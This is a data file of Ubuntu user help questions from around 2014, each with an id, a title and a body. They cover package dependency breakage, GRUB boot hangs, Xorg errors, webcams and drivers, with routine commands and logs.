498057	update broken on libdbus	on a recent update to my precise install the package manager seems to have got itself into a twist . cat /var/log/apt/history.log start-date : 2014-07-10 16:17:22 upgrade : libdbus-1-3 : amd64 ( 1.4.18-1ubuntu1.4 , 1.4.18-1ubuntu1.5 ) , libdbus-1-3 : i386 ( 1.4.18-1ubuntu1.4 , 1.4.18-1ubuntu1.5 ) , dbus : amd64 ( 1.4.18-1ubuntu1.4 , 1.4.18-1ubuntu1.5 ) , flashplugin-installer : amd64 ( 11.2.202.378ubuntu0.12.04.1 , 11.2.202.394ubuntu0.12.04.1 ) , dbus-x11 : amd64 ( 1.4.18-1ubuntu1.4 , 1.4.18-1ubuntu1.5 ) error : sub-process /usr/bin/dpkg returned an error code ( 2 ) end-date : 2014-07-10 16:17:41 output from apt-get update you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . libdbus-1-3 : breaks : libdbus-1-3 : i386 ( ! = 1.4.18-1ubuntu1.4 ) but 1.4.18-1ubuntu1.5 is installed libdbus-1-3 : i386 : breaks : libdbus-1-3 ( ! = 1.4.18-1ubuntu1.5 ) but 1.4.18-1ubuntu1.4 is installed e : unmet dependencies . try using -f. apt-get -f install dpkg : error processing libdbus-1-3 ( -- configure ) : libdbus-1-3 : amd64 1.4.18-1ubuntu1.4 can not be configured because libdbus-1-3 : i386 is in a different version ( 1.4.18-1ubuntu1.5 ) dpkg : error processing libdbus-1-3 : i386 ( -- configure ) : libdbus-1-3 : i386 1.4.18-1ubuntu1.5 can not be configured because libdbus-1-3 : amd64 is in a different version ( 1.4.18-1ubuntu1.4 ) errors were encountered while processing : libdbus-1-3 libdbus-1-3 : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i guess the i386 version no longer matches the x86_64 version for some reason ? i 'm unclear how to resolve this . help appreciated . many thanks in advance
498058	unable to log-in to phpmyadmin using ubuntu 14.4	i am using ubuntu 14.4 and installed phpmyadmin . when prompt to log in the root user and my user does not log-in . i tried reinstalling and to no surprise this did n't help . there is no error that shows up .
498060	how to get information about bios from terminal ?	i want to get bios information and print information about all structures . how to get via command-line ?
498064	problems with logitech orbicam webcam image	i have a problem with this webcam ( id - 046d:0892 , driver gspca ) on acer travelmate 8200 with ubuntu 14.04 . when using cheese or skype with preloaded v4l1compat.so library , it has bad image - it has lot of horizontal lines and my face is tripled on screen . but when i use guvcview to view camera stream and i choose one particular ( yvyu ) pixel format , it looks perfect . i tried to set or force this pixel format somehow for applications like cheese or skype , but without success . i also tried to change it using gstreamer-properties in video tab using a lot of variations of custom pipe string ( v4l2src device=/dev/video0 ! video/x-raw , format=yvyu and so on ) , but none of these worked - it tells me either invalid syntax or previewed image is still garbage . do anyone have some idea how to solve this please ?
498066	ubuntu for android - i do n't fully understand what it is	i read up on the ubuntu for android thing and i 'm confused , specifically on these topics : when you 're away from your home computer what os does your phone use ? is the os literally only for when you connect the phone to the pc ?
498069	dovecot crashing android mail ?	i 'm trying to configure dovecot , it seems to be used a lot and has server side mail filtering which i like . however , all my folders are subfolders of the inbox which seems to confuse the android mail client , which subsequently crashes when trying to view the sent mail . ca n't figure it out ! i 'm on a vps that i control and have full root access to my chunk . running a phone with android stock email client .
498070	removing `` user accounts '' from system settings	i do n't need user account management on my system settings for security reasons . is it possible to remove user management from settings ? although i do n't want it for all user accounts . as given above the dpkg-statoveride is working fine and it 's hided the user accounts . but how to show it again .
498072	xampp is not able to read windows files and folders	i recently installed ubuntu and xampp . i changed the permission of the htdocs folder , so i am able to work normally , but when i copy files and folders from windows xampp ca n't see them .
498073	but same web pages are opening in windows environment	my name is mathew from india . ubuntu is quite new for me . i am working in a org . where almost 300 systems are planted . i are trying to switch to ubuntu and installed 5 systems on ubuntu 14.x during testing i observed some web pages are not opening .i done lot on work on it . checked with isp for root cause analise.things are fine at isp side even changed the isp but problem is there removed all firewall things http : //ubuntuforums.org/showthread.php ? t=1660821 problem resolving many of the web pages problem with internet . certain website do not load at all . 12.04 changed web browsers loot of googling but problem is still there . but same web pages are opening in windows environment . note : - same problem is with other flavor of linux
498074	force chrome/chromium to use adwaita dark theme	is there a way to force chrome/chromium to use adwaita dark theme ? using ubuntu gnome 14.04 . i 've managed to force qt and every other apps to use dark theme ( by changing gtk-css ) , but i ca n't figure out how to force chrome to use dark theme for at least title bar .
498082	what to do with `` recompile with -fpic '' message	i 'm trying to configure the ffmpeg source package to build .so files rather than .a files . i run make after doing ./configure -- enable-shared this gives me the following message : /usr/bin/ld : libavutil/display.o : relocation r_x86_64_pc32 against undefined symbol 'hypot @ @ glibc_2.2.5 ' can not be used when making a shared object ; recompile with -fpic however , i 'm not sure where and how to add the -fpic flag .
498084	audio input is not detected	yesterday i was using the mic on windows 7 , and everything was fine . now i am on ubuntu 14.04 , and i find that there is not input detected . my motherboard type is ga-78lmt-s2p .
498087	stream iptv channels to tv	my provider give me a m3u playlist with iptv channels . i want to see them on tv with dlna support . i use minidlna to see video files from ubuntu pc on that tv . but iptv channels are n't files . how to get these channels on tv ?
498088	attempting to enter recovery mode and go to root	i have attempted to follow directions as listed in the `` how do i reset a lost administrative password '' question . the procedure is also listed in `` how do i boot into recovery mode '' . i get through the initial steps but the arrow keys stop working when i get to the recovery menu . they work fine selecting the boot option . i am running ubuntu 12.04.3 lts ( precise pangolin ) as a server .
498091	how can i fix library conflicts during compilation stemmed from manually installed packages from source code ?	i have ubuntu 14.04 upgraded from 12.04 making dist-upgrades . i did many manual installations such as ffmpeg , libglib and so on , in the past . i have a nice custom distro now , it works well but i have problems while trying to compile applications . the errors i got taught me lots , i found how to deal with linker errors , i list some of them below : how-can-i-guide-compiler-to-use-a-certain-library how-to-fix-pkg-prog-pkg-config-command-not-found-error pkg-config-modversion-glib-2-0-reports-older-version how-to-fix-libgmodule-2-0-so-0-could-not-read-symbols-invalid-operation-erro multiple-ffmpeg-library-paths-how-can-exclude-older-ffmpeg-installations how-can-i-use-a-particular-library-while-compiling i come to such a point that even i can get errors while compiling native ubuntu applications such as unity ( i want to embed unity launcher into cairo dock unity launcher in cairo dock ) how can i fix those library conflicts ? i lost manually compiled application 's directories so i have no chance to run make uninstall . i am fed up with adjusting library paths . what do you suggest me in this position ?
498095	configure installation of dependency package in custom apt-get	we are able to create a custom .deb package called geomonitor-v1.0.1.deb and then configured apt-get repository for it . so that we can install it as apt-get install geomonitor . now please let us know how we can configure to install a dependency while installing geomonitor . that is in order to work geomonitor application there is a need of package mono-runtime so we need to again run apt-get install mono-runtime to install it . so please let us know while installing apt-get install geomonitor it should also install mono-runtime as dependency package . can anyone please help us to configure it .
498099	failed to download repository information 12.04	while trying to update my computer i get the following error w : failed to fetch http : //deb.torproject.org/torproject.org/dists/ < precise > /main/binary-i386/packages 403 forbidden , e : some index files failed to download . they have been ignored , or old ones used instead . please help .
498100	xserver error ( ubuntu server 14.04 ) with xfce4 and xrdp	[ 1372.707 ] x.org x server 1.15.1 release date : 2014-04-13 [ 1372.707 ] x protocol version 11 , revision 0 [ 1372.707 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 1372.707 ] current operating system : linux vps25665 2.6.32-042stab090.5 # 1 smp sat jun 21 00:15:09 msk 2014 x86_64 [ 1372.707 ] kernel command line : quiet [ 1372.707 ] build date : 16 april 2014 01:36:29pm [ 1372.707 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see ubuntu.com/support ) [ 1372.707 ] current version of pixman : 0.30.2 [ 1372.707 ] before reporting problems , check wiki.x.org to make sure that you have the latest version . [ 1372.707 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1372.707 ] ( == ) log file : `` /var/log/xorg.1.log '' , time : tue jul 15 10:14:18 2014 [ 1372.708 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 1372.714 ] ( == ) no layout section . using the first screen section . [ 1372.714 ] ( == ) no screen section available . using defaults . [ 1372.714 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 1372.714 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 1372.716 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 1372.716 ] ( == ) automatically adding devices [ 1372.716 ] ( == ) automatically enabling devices [ 1372.716 ] ( == ) automatically adding gpu devices [ 1372.717 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 1372.717 ] entry deleted from font path . [ 1372.717 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 1372.717 ] entry deleted from font path . [ 1372.717 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 1372.717 ] entry deleted from font path . [ 1372.717 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 1372.717 ] entry deleted from font path . [ 1372.717 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 1372.717 ] entry deleted from font path . [ 1372.717 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 1372.717 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 1372.717 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 1372.717 ] ( ii ) loader magic : 0x7f0e037ded60 [ 1372.717 ] ( ii ) module abi versions : [ 1372.717 ] x.org ansi c emulation : 0.4 [ 1372.717 ] x.org video driver : 15.0 [ 1372.717 ] x.org xinput driver : 20.0 [ 1372.717 ] x.org server extension : 8.0 [ 1372.718 ] initializing built-in extension generic event extension [ 1372.718 ] initializing built-in extension shape [ 1372.718 ] initializing built-in extension mit-shm [ 1372.718 ] initializing built-in extension xinputextension [ 1372.718 ] initializing built-in extension xtest [ 1372.718 ] initializing built-in extension big-requests [ 1372.718 ] initializing built-in extension sync [ 1372.718 ] initializing built-in extension xkeyboard [ 1372.718 ] initializing built-in extension xc-misc [ 1372.718 ] initializing built-in extension security [ 1372.718 ] initializing built-in extension xinerama [ 1372.718 ] initializing built-in extension xfixes [ 1372.718 ] initializing built-in extension render [ 1372.718 ] initializing built-in extension randr [ 1372.718 ] initializing built-in extension composite [ 1372.718 ] initializing built-in extension damage [ 1372.718 ] initializing built-in extension mit-screen-saver [ 1372.718 ] initializing built-in extension double-buffer [ 1372.718 ] initializing built-in extension record [ 1372.718 ] initializing built-in extension dpms [ 1372.718 ] initializing built-in extension present [ 1372.718 ] initializing built-in extension dri3 [ 1372.718 ] initializing built-in extension x-resource [ 1372.718 ] initializing built-in extension xvideo [ 1372.718 ] initializing built-in extension xvideo-motioncompensation [ 1372.718 ] initializing built-in extension selinux [ 1372.718 ] initializing built-in extension xfree86-vidmodeextension [ 1372.718 ] initializing built-in extension xfree86-dga [ 1372.718 ] initializing built-in extension xfree86-dri [ 1372.718 ] initializing built-in extension dri2 [ 1372.718 ] ( ii ) loadmodule : `` glx '' [ 1372.721 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 1372.738 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 1372.738 ] compiled for 1.15.1 , module version = 1.0.0 [ 1372.738 ] abi class : x.org server extension , version 8.0 [ 1372.738 ] ( == ) aiglx enabled [ 1372.738 ] loading extension glx [ 1372.738 ] ( == ) matched modesetting as autoconfigured driver 0 [ 1372.738 ] ( == ) matched fbdev as autoconfigured driver 1 [ 1372.738 ] ( == ) matched vesa as autoconfigured driver 2 [ 1372.738 ] ( == ) assigned the driver to the xf86configlayout [ 1372.738 ] ( ii ) loadmodule : `` modesetting '' [ 1372.740 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 1372.741 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 1372.741 ] compiled for 1.15.0 , module version = 0.8.1 [ 1372.741 ] module class : x.org video driver [ 1372.741 ] abi class : x.org video driver , version 15.0 [ 1372.741 ] ( ii ) loadmodule : `` fbdev '' [ 1372.741 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 1372.742 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 1372.742 ] compiled for 1.15.0 , module version = 0.4.4 [ 1372.742 ] module class : x.org video driver [ 1372.742 ] abi class : x.org video driver , version 15.0 [ 1372.742 ] ( ii ) loadmodule : `` vesa '' [ 1372.743 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 1372.743 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 1372.743 ] compiled for 1.15.0 , module version = 2.3.3 [ 1372.743 ] module class : x.org video driver [ 1372.743 ] abi class : x.org video driver , version 15.0 [ 1372.743 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 1372.744 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 1372.744 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 1372.744 ] ( ee ) fatal server error : [ 1372.744 ] ( ee ) xf86openconsole : can not open /dev/tty0 ( no such file or directory ) [ 1372.744 ] ( ee ) [ 1372.744 ] ( ee ) please consult the the x.org foundation support at wiki.x.org for help . [ 1372.744 ] ( ee ) please also check the log file at `` /var/log/xorg.1.log '' for additional information . [ 1372.744 ] ( ee ) [ 1372.744 ] ( ww ) xf86closeconsole : kdsetmode failed : bad file descriptor [ 1372.744 ] ( ww ) xf86closeconsole : vt_getmode failed : bad file descriptor [ 1372.744 ] ( ee ) server terminated with error ( 1 ) . closing log file .
498102	how do i unlock /var/lib/dpkg/lock ?	i attempted to install dropbox on my ubuntu system , but now i am unable to install or uninstall any software . i get this error : e : unable to lock the administration directory /var/lib/dpkg/lock ? i have already tried killing dpkg and restarting it sudo kill -term pid but it immediately tries to finish the installation again and gets stuck . how do i resolve this ?
498106	iplymouth broke grub	i followed the steps in this thread : what happens if i disable and unistall plymouth ? now grub is broken . i 'm running ubuntu 12.04.4 without a gui and when my server boots now , i get a screen showing what services are starting and then it says : umount : /proc/fs/nfsd : device is busy . when i press the arrow keys , it alternates from this screen and the purple ubuntu splash screen .
498107	micromax mmx377g g usb modem not working in ubuntu10.04 and 12.04 32bit	recently i bought a micromax mmx377g 3g usb modem can not install in ubuntu10.04 and 12.04 32bit pls help me
498108	login as domain user ubuntu 14.04	i have installed powerbroker aka likewise-open on my ubuntu 14.04 desktop . i successfully added the desktop to the domain but i am unable to login as a domain user at login screen . i found some answers on other posts saying to edit the 'lightdm ' file but 14.04 has no such file . any help would be appreciated .
498114	trouble installing breach browser	i have downloaded breach on my linux virtualization in parallels , but i ca n't seem to get it to run . i have done : sudo apt-get install chromium-browser cd < the breach download directory > chrome_devel_sandbox=/usr/lib/chromium-browser/chrome-sandbox ./breach when i do the above , i get an error : < directory > /__auto_update_bundle__/exo_browser/exo_browser : error while loading shared libraries : libharfbuzz.so.0 : can not open shared object file : no such file or directory can anybody tell me what i 'm doing wrong ? thanks ! ! ! ! !
498115	built in webcam not working on ubuntu 12.04 lenovo x230 ( part 2 )	the cam seems to work on kamerka software but only when firefox is closed . i am trying to cam on www.swingingheaven.co.za , but its not working ( i am using firefox ) . the output of lsmod | grep uvc is : uvcvideo 72627 1 videodev 98259 2 uvcvideo the output of lsusb is : bus 003 device 003 : id 0bdb:1926 ericsson business mobile networks bv bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 413c:3012 dell computer corp. optical wheel mouse bus 001 device 004 : id 147e:2020 upek bus 001 device 005 : id 0a5c:21e6 broadcom corp . bus 001 device 006 : id 5986:02d2 acer , inc
498118	videos on star sports do not play on ubuntu but works fine on windows	i can watch videos on any online site but i just cant watch any online live video streamed on star sports while i can watch them in window7 flash player is installed and is in an excellent condition .
498119	removing proxy to avoid problems during installation	i tried to install java and got this error err http : //security.ubuntu.com/ubuntu/ precise-security/main icedtea-6-jre-jamvm i386 6b27-1.12.3-0ubuntu1~12.04.1 something wicked happened resolving 'proxy.ssn.net:8080 ' ( -5 - no address associated with hostname ) i think the proxy is causing trouble . proxy.ssn.net:8080 is my college proxy . how to remove this ? or is there anything else that is causing problem ?
498121	find out if installed package is a dependent to other installed package	according to the title that . solution like this one : apt-cache rdepends packagename does list all the reverse package . although most of the packages in the list i do not have in my system installed . example : apt-cache rdepends python-gpgme python-gpgme reverse depends : python-bzrlib bzr python-gpgme : i386 nautilus-dropbox assword alot python-gpgme-dbg python-bzrlib bzr i do not have bzr , nautilus , alot , and others installed . so , what is the correct command to find out the list of installed dependent package to that `` target '' package ? i need to know if python-gpgme is okay to purge .
498122	is it possible to diy a command under ubuntu ?	for example , can i set ? gb = cd /media/dan/evolution so that everytime i execute gb in bash , i can cd to that particular directory ? i find something online , 'alias ' command . but it seems ca n't do the work above . is it possible to do it ? how ? # i 'm using ubuntu 14.04
498126	how to send different outout to multiple terminal on the same machine	i want to be able to run my python scripts in one terminal but to print the useful output to another terminal on the same machine . having the ability to refresh the terminal with the useful output would also be good because then the useful out can be built up incrementally as though its printing out . how can i do this ? i have googled this but most answers relate to using things like 'write ' and 'talk ' . with 'write ' i can send messages to another terminal but there isnât much control over which window or refreshing/clearing the screen . i am using ubuntu trusty tahr
498127	my top bar is broken	after drag & dropping by accident a .xpm file on the top bar , the right-hand side is now totally missing ( see attached example of missing pieces ) : ( how can i get this back , please ? update : it seems i am using gnome ( flashback ) metacity ( and no i do n't want to switch to unity just in case somebody 's asking : ) update2 : running dconf reset -f /org/gnome/gnome-panel/ solved my problem !
498129	fail to connect to socket , /var/run/dbus/system_bus_socket	when i want to boot from cd , or install new version ( 13.10 , 14.04 ) of ubuntu , and also ( elemntaryos ) i got nothing in the monitor , recently i found it has the following problem fail to connect to socket , /var/run/dbus/system_bus_socket i have surfed the net. , but all solution were for installed version of ubuntu , but i do n't have it installed . what should i do ? thanks in advance
498132	installing driver for matrox m9140 on ubuntu 14.04	os : ubuntu 14.04 64-bit graphics card : matrox m9140 monitor : dell ultrasharp u2312hm 23 '' driver location : http : //www.matrox.com/graphics/en/support/drivers/download/ ? cid=mte2mtm3nq== & id=574 i 've been trying and failing to install the driver from the official matrox site for my ubuntu installation . my resolution only has 640x480 option . needless to say i need something better . i keep getting the following error when i run the .run file that i downloaded from the matrox website for the driver installation : error : xorg 6.9 , 7.1 , 7.2 , 7.3 , 7.4 , 7.5 or xserver 1.9 , 1.10 , 1.11 , 1.12 or 1.13 not found . please update xorg . as far as i can tell , i have both xorg and xserver installed . i 've run the following commands to check : sudo apt-get install xserver-xorg-core sudo apt-get install xserver-xorg sudo apt-get install xorg and the output always says `` xorg is already the newest version '' . i do not have a /etc/x11/xorg.conf file . but i did n't get the impression that that is a problem ? when it asks me to choose a folder for the installation i just choose the default /home/ [ my_username ] / . in the readme for the installation under `` troubleshooting '' i do n't see the error listed , but it does mention i need some files such as /usr/lib/xorg/modules/drivers/m9x_drv.so , which i do not have . this looks like a file that the installer should be installing , no ? i 've googled this to and no luck with any information on it . of the only two threads i could find with the above error message , one is in german ( http : //debianforum.de/forum/viewtopic.php ? f=2 & t=147997 ) and one is in french ( [ just remove the space , i can only post two links per post : - ( ] http : //forum.ubuntu-fr.org/viewtopic.php ? id=1136951 ) and neither seemed to give me a decent solution . output of lspci | grep -i vga is : 01:00.0 vga compatible controller : matrox electronics systems ltd. m91xx ( rev 01 ) i 'm not very experienced messing around with this particular area of ubuntu and my shenanigans have already resulted in a clean install . your guidance would be greatly appreciated . thanks !
498133	how to install ubuntu 14.04 on hp dynamic smart array b120i logical drive	i 've got some problems when trying to install ubuntu on hp proliant dl 160 gen8 . i 've got 3 logical drives in dynamic smart array controller , and on installation screen i see only physical drives . how to install it on logical volume ? i am using ubuntu 14.04
498134	linux-swap turns swap off during turn off	when i found my system being too slow , i created a linux-swap with the help of gparted . it has helped me highly , providing a reliable processing speed without any blackening of my screen . but whenever i turn off my system the partition turns to swap off mode . so whenever i turn on my system again , i need to swap on my linux-swap . i am tired of waking it up every time when i start off my system . is there any way to make my linux-swap to swap on itself as and when the system boots ?
498138	ca n't boot into ubuntu please help my files are all gone	i have a windows 8 based sony vaio laptop . recently i installed ubuntu 14.04 lts on my laptop alongside windows , now i ca n't login into ubuntu anymore . the boot menu directly boots into windows 8 and does n't show the grub menu . all my files are on ubuntu , how can i access it or at least how can i retrieve them ?
498139	microphone volume very low	i 've installed ubuntu , but microphone volume level very low . ( skype for example ) looks like the problem only on settings page , because on if i open `` pulse audio meter '' , looks like working fine . could you check my attached screenshot ?
498149	ubuntu 14.04 does not have keyboard in all settings	all settings contains : language support security privacy printers landscape service software & updates but i do n't have `` keyboard '' . why ?
498153	accented characters not rendering correctly on title bar in ubuntu 14.04	so i 've noticed this problem after i upgraded from ubuntu 13.10 a few days back . i 've noticed that whenever a window title is supposed to contain any accented character like `` 誰 '' , the title bar replaces the character with a box notice that `` da誰a '' is displaying correctly inside the window but not on the title bar . also , this problem only appears when the window in question is not maximised . upon maximising the window , the character renders correctly . my question is , why is this happening and how can i fix this ? is this a bug ? i 'd appreciate any advice . thanks .
498155	get wi-fi hotspot ( access point mode ) working in trusty tahr with network manager	i have read that the networkmanager is supposed to be capable of creating a hotspot in access point mode since version 0.9.8 . i 've got the networkmanager installed that comes with trusty tahr ( version 0.9.8.8 ) . my networkcard supports ap . but i ca n't find an option in networkmanager to create an access point mode hotspot . maybe i 'm missing a package ? or maybe i 'm just too stupid to use the gui properly ? [ ... not relevant anymore ]
498158	how to partiion with g parted	hello i have five 2tb hard drives and i would like to make the computer with ubuntu read all 10 like right now it just shows the one 2tb that has ubuntu installed on it all the others are their their just not included in the whole drive size like when i right click properties it says the remaining size of the single 2tb hard drive . the other 2 hard drives are their i put extended and linux swap under the rest of them if this is in correct please tell me what to do .
498161	boot up problem ( 14.04 + grub + swap + nvidia ) - with pictures	when i start my laptop , it takes as much as 7 tries to get past the place where the swap gets mounted ; if anyone is looking over my shoulder then it becomes 15 tries ! my laptop is a lenovo w520 with an nvidia ( quddro 1000m ) card using the open source driver ( x.org x server ) and ubuntu 14.04 . it is a triple boot , but i do n't think this has any effect on this problem . i had this problem from the moment i installed 14.04 , i was hoping some update would fix it , but it has been months and none of the updates have fixed it . i found only one thread that is related to my problem , and have tried every offered solution in the entire wiki . none of them worked for me . the thread : my computer boots to a black screen , what options do i have to fix it ? my symptoms : the last line on the screen when computer hangs is always : 'adding 4215004k swap on /dev/sda6 . priority : -1 extents:1 across:4215004k fs' the hard drive led on the laptop turns off the cpu fan goes into super high cool mode . computer will sit in that state forever ( once i let it do that for over an hour ) attempts to fix 1 ) i followed the wiki mentioned above and tried 'no splash ' and 'nomodeset ' in the grub menu . i also played around by making the 'ro ' in that same line 'rw ' - hoping that additional permissions will help . as well , i plugged and unplugged my second monitor , the power supply and usb devices to see if any one item has a repeatable effect on my problem . it did not . i was hoping to find the culprit causing the problem , but all i found is that everything i tried had no direct impact on the problem . i kept a chart : 2 ) two things we can rule out are ( a ) the screen is too dark - not the case ( b ) usb device causing this problem - not possible as problem persists with and without usb devices connected . 3 ) i made sure that in bios my 'optimus ' is disabled . as well i am using the open source driver , so i hope this is not an 'nvidia ' problem , but a grub problem . 4 ) i reinstalled the grub and that did n't help . 5 ) i played with /etc/defaults/grub but none of the suggestions i found on this website had any positive effect on my problem . the contents of my file is below : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` # _mo_ i commented out the line below to see the shutdown process # grub_cmdline_linux_default= '' quiet splash '' # grub_cmdline_linux= '' '' # _mo_ the top line fixed my shutdown problems but i have startup # prolems now . so below i hope this works : grub_cmdline_linux= '' no splash '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' i am fresh out of ideas . if i may provide any information , or logs or perform some changes on my side please let me know . thanks in advance . mike . *******************************edit # 1*************************************** i saw this post , does it apply to my problem ? first boot not happening [ 7.471657 ] adding 4041724k swap on /dev/sda7 priority : -1 extents : 1 across :4041724k fs here is my setup in gparted : ******************************edit # 2****************************************** several people suggested that i remove my swap partition . i did . however that only changed the problem ; the booting got stuck on a different line . basically instead of hanging up on the swap partition mounting , the boot hung up on my touch pad . when that happened the hdd led turned off and the pc just sat there for several minutes before i had to restart it . after 3 back to back getting stuck in the same place i put the swap partition back . i took a picture of where it was getting stuck when the swap was gone : ******************************edit # 3****************************************** i made a mistake in the procedure i carried out in 'edit # 2 ' . after deleting the partition i never removed a line of code from /etc/fstub . so i repeated the process where i deleted the swap section , then i commented out the swap line in the /etc/fstub file . this did not fix my problem , but it did create different symptoms . this post is very long already so instead of including a chart i will simply provide the conclusions of rebooting my pc a total of 45 times without a swap partition . it booted ok 25 times it failed to boot 20 times it is way , way , way more likely to boot up if the power is plugged in , the second monitor is plugged in , and my usb hub is plugged in ( with no devices plugged into hub ) it is highly unlikely to boot up if nothing is connected to the laptop ( no power cord , no vga cord for second monitor , and no usb hub ) . out of 20 failed boots 12 times there was nothing connected to the laptop . when the pc fails to boot it is the same screen as in edit # 2 , even though i have seen a different screen as well when it freezes . the state the pc is in messes me up , because when i take my laptop to the field , i need to have my laptop work , and since there are no cords connected to my pc it is not likely to start . fyi : my /etc/default/grub is the same as in the body of the post . i set it as the first linked post suggested and kept it there as it has worked in the past for others . for the sake of full disclosure there is another bug i thought to be unrelated , but since i made it this far , i want to get it off my chest : any time i try to adjust my screen brightness using a fn key and two brightness keys ( home & end ) , the operating system freezes and does not unfreeze ; requiring a pc restart by pressing the power button . this feature used to work in 12.04 . any ideas ? i will carry out any suggestions . **************************************edit # 4***************************** hi guys thanks for your help ! here is what i did : sudo apt-get update sudo update-grup sudo shutdown now //this made my computer act really funny . it did n't quite shutdown correctly and i was looking at a screen with some 'noveau ' message . i pressed the power button for 4 secs and the computer shutdown . here is what i saw : once the computer was shutdown , i unplugged all the cords ( power , vga , usb hub with no deviced connected to it ) and restarted the pc . it failed to boot , so i kept pressing the power button and restarting it until it finally booted ( took about 3 tries to get it to boot ) . when the pc finally booted it asked for permission to report a problem to ubuntu . i did report the problem . i got the contents of the following logs : /var/log/kern.log http : //pastebin.ubuntu.com/7819929/ /var/log/xorg.0.log http : //pastebin.ubuntu.com/7819982/ /var/log/gpu-manager.log http : //pastebin.ubuntu.com/7819987/ i am off to work , when i get back i will post the results of all the other suggestions ( memtest , etc.. ) . thanks for all your help . keep telling me what to do and i will do it and make a write up on the results here . **********the info below is complemetary to oldfred 's answer*********** it seems that a solution has been found . 'oldfred ' is the first to suggest a working solution . thanks ! i did a bunch of testing and ultimatly this is what you need to do if you have this happen to you : 1 ) using gparted i added back my swap partition . the swap partition is not related to this problem . as several people noted , the swap message was just the last line displayed on the screen when the o/s froze . 2 ) to test if this solution works for you , when the purple grub screen appears press e to edit the entry . then add the following to the end of the line starting with linux : acpi_osi=linux acpi_backlight=vendor 3 ) if this works for you , then to make this change permenant open your /etc/default/grub as sudo ( sudo gedit /etc/default/grub ) 4 ) change the string of grub_cmdline_linux= '' no splash '' to grub_cmdline_linux= '' no splash acpi_osi=linux acpi_backlight=vendor '' 5 ) lastly get grub to load you new settings by typing sudo update-grub bingo , all works properly ! ! thanks to everyone for your help . i appreciate it .
498163	upgraded hardware-enablement-stack on 12.04 . nvidia is n't working , and wo n't install	there also seem to be some weird behaviours related to the network ( taking a very long time to pull updates , but also load webpages , etc . ) note : i ca n't do a full update to 14.04 for work reasons . is there an easy way to roll back this update ? or to fix whatever might be ailing it ? note : when i go to install nvidia-304 ( say ) directly , it gives me an error that there are unmet dependencies on xorg-video-abi
498166	ubuntu does n't show when restarting macbook pro	i 've had ubuntu for a while now , almost two weeks . i used refit as a tool to open ubuntu when i restart . i decided to delete it . now i ca n't open ubuntu . when i restart my macbook pro and press alt/option at start up , i get two disks options , macintosh hd and recovery . viewing disk utility in my mac os i know that ubuntu is still there , i want to use it : )
498167	unable to upgrade 12.10 to subsequent releases	i know 12.10 is no longer supported and that transition period ended in may or july 2014 . i simply wanted to upgrade to 13.10 , and from there on to 14.05 doing the usual sudo do-release-upgrade command and everything that comes with it , but it dose n't seem to work . the commandline message i get after a while is error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/saucy/universe/source/sources 404 not found [ ip : 91.189.91.14 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done any ideas on what 's going on ? the menu from software updater is also giving me the message that the repository can no longer be accessed ( since 12.10 is not supported anymore ) . what are my options ? thanks
